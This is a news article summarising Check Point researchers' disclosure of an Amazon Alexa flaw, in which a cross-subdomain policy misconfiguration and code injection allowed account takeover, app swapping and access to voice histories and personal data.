Check Point researchers uncovered Alexa flaw that exposed personal information and speech histories

Researchers at Check Point say they identified an exploit in Amazon’s Alexa voice platform that could have given attackers access to users’ personal information, speech histories, and Amazon accounts. In a blog post, they describe the way in which an attack might have been carried out against a user, beginning with a malicious link pointing to a page with code-injection capabilities.

Maintaining privacy with voice assistants is a challenging task, given that state-of-the-art AI techniques have been used to infer attributes like intention, gender, emotional state, and identity from timbre, pitch, and speaker style. Recent reporting revealed that accidental voice assistant activations exposed private conversations, and a study by Clemson University School of Computing researchers that found that Amazon Alexa and Google Assistant voice app privacy policies are often “problematic” and violate baseline requirements. The risk is such that law firms including Mishcon de Reya have advised staff to mute smart speakers when they talk about client matters at home.

The Check Point researchers say they identified the vulnerability by conducting tests with the Alexa smartphone companion app. Using a script to bypass a mechanism that prevented them from inspecting network traffic, they found that several requests the app made had a misconfigured policy that allowed the sending of requests from any Amazon subdomain. It’s their assertion that this could potentially have allowed attackers with code-injection capabilities on one subdomain to perform a cross-domain attack on another Amazon subdomain.

In a proof of concept, the researchers exploited the flaw in one of Amazon’s subdomains to leverage cookies and the misconfigured policy to make modifications to Alexa accounts. They created links that directed dummy victims to track.amazon.com, from which the researchers could send requests containing the victims’ cookies to a URL that returned lists of voice apps installed on the victims’ Alexa accounts. The researchers then used a token to remove a common app from the lists and install a malicious app with the same invocation phrase as the deleted app. This way, once the victims tried to use the invocation phrase, they unwittingly triggered the malicious attacker app.

From there, the researchers essentially performed actions on behalf of victims, causing a server-side error to execute custom code. They took full control of the victims’ accounts to:

  1. Get a list of voice apps that could later be used to replace one of the victims’ apps with a published app of the attacker’s choosing from the Alexa Skills Store.
  2. Silently remove an installed app from the victims’ accounts.
  3. Get the victims’ voice history with Alexa, including each command and Alexa’s responses to them. (The researchers note this could have exposed personal data like banking history, usernames, and phone numbers depending on the voice apps installed.)
  4. Look up personal information stored in users’ profiles, such as home addresses.

The researchers say their work exposes a weak point in bridges to internet of things appliances like smart speakers. Both the bridge and the devices serve as entry points, they say, and they must be secured at all times to keep hackers from infiltrating homes.

“Virtual assistants are used in smart homes to control everyday IoT devices such as lights, A/C, vacuum cleaners, electricity, and entertainment. They grew in popularity in the past decade to play a role in our daily lives, and it seems as technology evolves, they will become more pervasive,” the researchers wrote in a blog post. “As virtual assistants today serve as entry points to people’s home appliances and device controllers, securing these points has become critical, with maintaining the user’s privacy being top priority.”

View original article here Source